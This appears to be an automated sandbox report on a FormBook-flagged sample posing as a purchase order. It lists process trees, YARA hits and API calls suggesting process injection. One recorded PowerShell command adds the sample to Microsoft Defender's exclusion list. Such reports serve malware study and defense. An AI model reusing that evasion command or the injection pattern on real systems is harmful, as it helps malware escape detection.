                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1416&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Nov 18, 2024 13:55:52.522773981 CET | 346 bytes | IN | (continuation of the gzip-compressed response body; raw bytes omitted)



                                                                                                      Target ID:0
                                                                                                      Start time:07:52:46
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Users\user\Desktop\PO 20495088.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\PO 20495088.exe"
                                                                                                      Imagebase:0xbb0000
                                                                                                      File size:710'144 bytes
                                                                                                      MD5 hash:68465DD1E3101B1BFA0CFF10EBADB8CC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:07:53:15
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"
                                                                                                      Imagebase:0x650000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:07:53:15
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:07:53:15
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Users\user\Desktop\PO 20495088.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\PO 20495088.exe"
                                                                                                      Imagebase:0xbd0000
                                                                                                      File size:710'144 bytes
                                                                                                      MD5 hash:68465DD1E3101B1BFA0CFF10EBADB8CC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:07:53:32
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe"
                                                                                                      Imagebase:0xd20000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:9
                                                                                                      Start time:07:53:34
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\sdiagnhost.exe"
                                                                                                      Imagebase:0x230000
                                                                                                      File size:31'744 bytes
                                                                                                      MD5 hash:76676F0A21E6AF109845151B3CEFE211
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Target ID:10
                                                                                                      Start time:07:53:47
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe"
                                                                                                      Imagebase:0xd20000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:11
                                                                                                      Start time:07:53:59
                                                                                                      Start date:18/11/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff79f9e0000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true


                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.9%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:5.2%
                                                                                                        Total number of Nodes:286
                                                                                                        Total number of Limit Nodes:17
                                                                                                        execution_graph: [raw graph edge data omitted; the nodes reference the APIs CreateActCtxA, GetModuleHandleW, Wow64SetThreadContext, ResumeThread, WriteProcessMemory, VirtualAllocEx, CreateProcessA, ReadProcessMemory, DuplicateHandle, PostMessageW and CallWindowProcW]

                                                                                                        Control-flow Graph (function at 54e72d8): [graph rendering data omitted]
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345576448.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54e0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $ $ $ $&$&$0$0$2$6$6$$eq
                                                                                                        • API String ID: 0-3159671626
                                                                                                        • Opcode ID: 40cca7186f7ad152c20ca02d37c40fcb57e5cc0efee03baa8d94dbc7c83b1d26
                                                                                                        • Instruction ID: 7eaa25a8b0c2284ea779425deedd73e0ce1814c8f8673dacdccbd2b2b47f23c3
                                                                                                        • Opcode Fuzzy Hash: 40cca7186f7ad152c20ca02d37c40fcb57e5cc0efee03baa8d94dbc7c83b1d26
                                                                                                        • Instruction Fuzzy Hash: 58E22B30A10705CFCB55EF74C898ADAB7B2FF89301F5186AAD5496B360EB71A985CF40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345609906.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$4'eq$4|jq$4|jq$$eq
                                                                                                        • API String ID: 0-3429346994
                                                                                                        • Opcode ID: 355db3257c95ce8ad185f0aa61df47ee9e5059cd7c2a139d2524f6c776c962fa
                                                                                                        • Instruction ID: ca57789f4da7d1e27a02066a622c1b08280e1c8f31a8269ba89bb6a6134582c5
                                                                                                        • Opcode Fuzzy Hash: 355db3257c95ce8ad185f0aa61df47ee9e5059cd7c2a139d2524f6c776c962fa
                                                                                                        • Instruction Fuzzy Hash: 6F22CA71F042058FCB19DF6DD498AAE7BB2BF89310B1984AAD506DB351DB31DC42CB91

                                                                                                        Control-flow Graph (function at 54fccf6): [graph rendering data omitted]
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345609906.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: D
                                                                                                        • API String ID: 0-2746444292
                                                                                                        • Opcode ID: b672cee15330cda9144460e67313588e4c2ba2b664d613d2bcb796777b105441
                                                                                                        • Instruction ID: 0559c19de8858aeefc69d5b0563b472d9b8d705362b4cf1899f91ee026d651e1
                                                                                                        • Opcode Fuzzy Hash: b672cee15330cda9144460e67313588e4c2ba2b664d613d2bcb796777b105441
                                                                                                        • Instruction Fuzzy Hash: AF52A674A102299FCB64DF68D998A9DBBB2FF89310F1081D9D509A7365CB30AEC1CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2368528787.000000000AD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ad50000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6cdfd857015cabbc22e61845b40fa1df06a5ab769f3b890dc977f231bccf3d26
                                                                                                        • Instruction ID: 76f4a575cae43753420a63034ac43a01171c00356ba0a8c044cb18a2e7d369e1
                                                                                                        • Opcode Fuzzy Hash: 6cdfd857015cabbc22e61845b40fa1df06a5ab769f3b890dc977f231bccf3d26
                                                                                                        • Instruction Fuzzy Hash: E932AB70B012059FEB19EB79C460BAEB7F6BF88300F55446AE546EB3A0DB35E901CB51

                                                                                                        Control-flow Graph (function at 748ca85): [graph rendering data omitted]
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0748CCC6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 226ff09a8673bdb62c12af31fa91de057de1da9514edaa856e8dc2b5bfcd2356
                                                                                                        • Instruction ID: 90c606737ca62deca58b0321a70520d33a1e54596cd504888590b7dcfff4d102
                                                                                                        • Opcode Fuzzy Hash: 226ff09a8673bdb62c12af31fa91de057de1da9514edaa856e8dc2b5bfcd2356
                                                                                                        • Instruction Fuzzy Hash: 17914EB1D0061ACFDB50EF69C8817EEBBB2FF44310F1481AAD818A7250D7749985CFA1

                                                                                                        Control-flow Graph (function at 748ca90): [graph rendering data omitted]
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0748CCC6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: d58b08f20b3c2543f3ddfbc3b1faa44514aea3044206124a03710247e1359e6a
                                                                                                        • Instruction ID: 5e4b66ad6cde4a7d851ae3e41840f4013f4606383b4eb87475b746a9ba9df383
                                                                                                        • Opcode Fuzzy Hash: d58b08f20b3c2543f3ddfbc3b1faa44514aea3044206124a03710247e1359e6a
                                                                                                        • Instruction Fuzzy Hash: 75914DB1D0061ECFDB54EF69C8817EEBBB2BF44310F1485AAD818A7250DB749985CFA1

                                                                                                        Control-flow Graph (function at 158ad28): [graph rendering data omitted]
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0158AF7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: cfa620855bda496243cdee49c2a07849eb688edb5bcb53aa36b42ff249a6da49
                                                                                                        • Instruction ID: b32ecd5705e65002350fd2dee5fcb7ab253ec5f3555f2bee644cc4e8d85a59ef
                                                                                                        • Opcode Fuzzy Hash: cfa620855bda496243cdee49c2a07849eb688edb5bcb53aa36b42ff249a6da49
                                                                                                        • Instruction Fuzzy Hash: E57135B0A00B058FDB25EF6AD44475ABBF1FF88300F00892ED59AEBA54D774E945CB91

                                                                                                        Control-flow Graph

                                                                                                        [Control-flow graph of the function starting at 015858EC; CreateActCtxA is called from the entry block 015858EC-015859B9, and the function ends in a self-looping block at 01585A41. The rendered graph, its basic-block edge list and the executed / not-executed legend are not reproduced in this text extract.]
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 015859A9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: 6558d8067c16baa117616446875c9de1a9ce3ad26455d4beb646f6637c50b9bf
                                                                                                        • Instruction ID: 519fce0c3e7805c656f1071c5cf87b5d5a6077402e4a21acb94220eccdec2476
                                                                                                        • Opcode Fuzzy Hash: 6558d8067c16baa117616446875c9de1a9ce3ad26455d4beb646f6637c50b9bf
                                                                                                        • Instruction Fuzzy Hash: E941EFB1C10719CBDB24DFA9C884BDDBBB5BF49304F20815AD408BB255EBB5694ACF90

                                                                                                        Control-flow Graph

                                                                                                        [Control-flow graph of the function starting at 015844B0; CreateActCtxA is called from the entry block 015844B0-015859B9, and the function ends in a self-looping block at 01585A41. The rendered graph, its basic-block edge list and the executed / not-executed legend are not reproduced in this text extract.]
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 015859A9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: 21163da705b9091f2e94a8f4c5a403658c75a523862c3246e6eb2bd1bdba89c5
                                                                                                        • Instruction ID: 9fd9b9cb685cabc6adbe450dc75f043390ce6e832b4b9f3f1962f4fa45bd01bd
                                                                                                        • Opcode Fuzzy Hash: 21163da705b9091f2e94a8f4c5a403658c75a523862c3246e6eb2bd1bdba89c5
                                                                                                        • Instruction Fuzzy Hash: 4841CEB0C10719CBDB24DFA9C884B9EBBF5BF49304F60816AD408BB255DBB56945CF90

                                                                                                        Control-flow Graph

                                                                                                        [Control-flow graph of the function starting at 054E4050 (entry block 054E4050-054E408C); CallWindowProcW is called from block 054E40EA-054E4122. The rendered graph, its basic-block edge list and the executed / not-executed legend are not reproduced in this text extract.]
                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 054E4111
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345576448.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54e0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        • Opcode ID: 96a7ce1c1f01116db6440d7f90776cfd3f28966e1729e7f079ea8a3e0355da03
                                                                                                        • Instruction ID: 76ac1850989e1ce6b0fedc80279f1b80a8b675392c5f4d05fe8b5725466a1a19
                                                                                                        • Opcode Fuzzy Hash: 96a7ce1c1f01116db6440d7f90776cfd3f28966e1729e7f079ea8a3e0355da03
                                                                                                        • Instruction Fuzzy Hash: E541E5B9900309CFCB14CF99C848AEAFBF5FB98314F248599D519AB321D775A941CFA0

                                                                                                        Control-flow Graph

                                                                                                        [Control-flow graph of the function starting at 0158D6C9 (entry block 0158D6C9-0158D6D0); DuplicateHandle is called from block 0158D68C-0158D69C. The rendered graph, its basic-block edge list and the executed / not-executed legend are not reproduced in this text extract.]
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158D5CE,?,?,?,?,?), ref: 0158D68F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 1e57ae4a763595f64c40071c1680fe6170f0fbf4776c7f2e79dbc8c133016cfe
                                                                                                        • Instruction ID: 8bcc8f3f13af20d1e95f09d01a797874a0b4d3209308318f7e4e9112cef3457d
                                                                                                        • Opcode Fuzzy Hash: 1e57ae4a763595f64c40071c1680fe6170f0fbf4776c7f2e79dbc8c133016cfe
                                                                                                        • Instruction Fuzzy Hash: 4431B238A803499FE708DF60E8957B97BA7F784394F118439E9218B3C8CAB44865CB11

                                                                                                        Control-flow Graph

                                                                                                        [Control-flow graph of the function starting at 0748C800 (entry block 0748C800-0748C856); WriteProcessMemory is called from block 0748C866-0748C8A5. The rendered graph, its basic-block edge list and the executed / not-executed legend are not reproduced in this text extract.]
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0748C898
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: fe2ba4559dc3e15cbb6b5cc038e9036e3c380ee1eb0d24269115b640413c7ee0
                                                                                                        • Instruction ID: 32865e9f7b0f09c3ead334bcb1c81aa6e69eb0fe2fdeb4a7d5dd802733357b7a
                                                                                                        • Opcode Fuzzy Hash: fe2ba4559dc3e15cbb6b5cc038e9036e3c380ee1eb0d24269115b640413c7ee0
                                                                                                        • Instruction Fuzzy Hash: CB215AB1D003099FCB10DFA9C985BDEBBF5FF48310F10842AE919A7241D7789944DBA1
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0748C898
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 15f37803cca17f09ed1f34df101e01d19a113fc77e599bc46d239b84b4850c33
                                                                                                        • Instruction ID: dccdfb2c87b025b1994fc29348a22556ea1942cad640cc973bc7bd9b45aeb460
                                                                                                        • Opcode Fuzzy Hash: 15f37803cca17f09ed1f34df101e01d19a113fc77e599bc46d239b84b4850c33
                                                                                                        • Instruction Fuzzy Hash: DF2127B19003599FCB10DFA9C985BDEBBF5FF48310F10882AE919A7241D7789944DBA4
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0748C6EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: cfe298c5a14e324d00eb2b89ce3496acb57f4d34725ff73ba14e19f76e79f60e
                                                                                                        • Instruction ID: d1f28b4d1ae12bae4a493fce03900d2edf664713bbe430d1109d5b9d7758d701
                                                                                                        • Opcode Fuzzy Hash: cfe298c5a14e324d00eb2b89ce3496acb57f4d34725ff73ba14e19f76e79f60e
                                                                                                        • Instruction Fuzzy Hash: 9C213AB29003098FDB50DFAAC4857EEBFF4EF88324F14842AD559A7241DB789945CFA1
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0748C978
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 91ea09f2ea1e9d45d976f570e31524062caceb5edeeab51873e3671972bb8300
                                                                                                        • Instruction ID: 0f4820ffde75586eb598a8f84b37bce505b0b281e307fd08aef095a5ffb094cb
                                                                                                        • Opcode Fuzzy Hash: 91ea09f2ea1e9d45d976f570e31524062caceb5edeeab51873e3671972bb8300
                                                                                                        • Instruction Fuzzy Hash: 49214AB18003199FCB10DFA9C885BDEFBF5FF48320F54842AE918A3250D7349940DBA1
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158D5CE,?,?,?,?,?), ref: 0158D68F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 5ec38ff38a5345f7312cc3913721b44b05ac5f47418d339c2776f93e2ceef47f
                                                                                                        • Instruction ID: 3de0ca6927d3c8b2329b02ceddcc8a58c28d6d6bcd3b45f1660e73a0255a36a2
                                                                                                        • Opcode Fuzzy Hash: 5ec38ff38a5345f7312cc3913721b44b05ac5f47418d339c2776f93e2ceef47f
                                                                                                        • Instruction Fuzzy Hash: D221F4B5900208AFDB10DF9AD884ADEBBF4FB48314F14841AE918B7350D378A940CFA5
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0158D5CE,?,?,?,?,?), ref: 0158D68F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 322c597f97fbd82b94d8f27210f055f6c36bf59effd33d229bd11396e0c5388a
                                                                                                        • Instruction ID: 33725f872b092a886a4016d3ae5e9c4c231d2a1d27b8cd35a09ee95a960eaa1a
                                                                                                        • Opcode Fuzzy Hash: 322c597f97fbd82b94d8f27210f055f6c36bf59effd33d229bd11396e0c5388a
                                                                                                        • Instruction Fuzzy Hash: 1021E4B59002099FDB10CFA9D984ADEBBF5FB48324F14841AE958B7351D378A944CF61
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0748C6EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: a5407bc33986fbf21ee9329c6313ed6e72d5fbc31ae42afb7ef2af423bb159b6
                                                                                                        • Instruction ID: 63a4f0954c4efd382f18b44bec6efad1a76da26849c9ae3cc92d7955d80cd287
                                                                                                        • Opcode Fuzzy Hash: a5407bc33986fbf21ee9329c6313ed6e72d5fbc31ae42afb7ef2af423bb159b6
                                                                                                        • Instruction Fuzzy Hash: AA2149B1D003098FDB10DFAAC4857EEBBF4EF88324F14842AD519A7241CB789945CFA0
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0748C978
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 07f0087e241c984949d0a07f6dcbf36f09b3476da65fac4bc2f764c8cc7c48ae
                                                                                                        • Instruction ID: 5558a74bd7fc83e55ddc58c1d2ce5e0cc11708245c95e2848741c6c596e1e6ee
                                                                                                        • Instruction Fuzzy Hash: 8B210471504200EFDB06DF98D9C0B2ABBB5FBC8324F64C96DE9094F256C33AD806CA61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338062314.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_153d000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e46e1dbab305f6fa8ffdea74736a82d6148f168064d758188f08088e110b2266
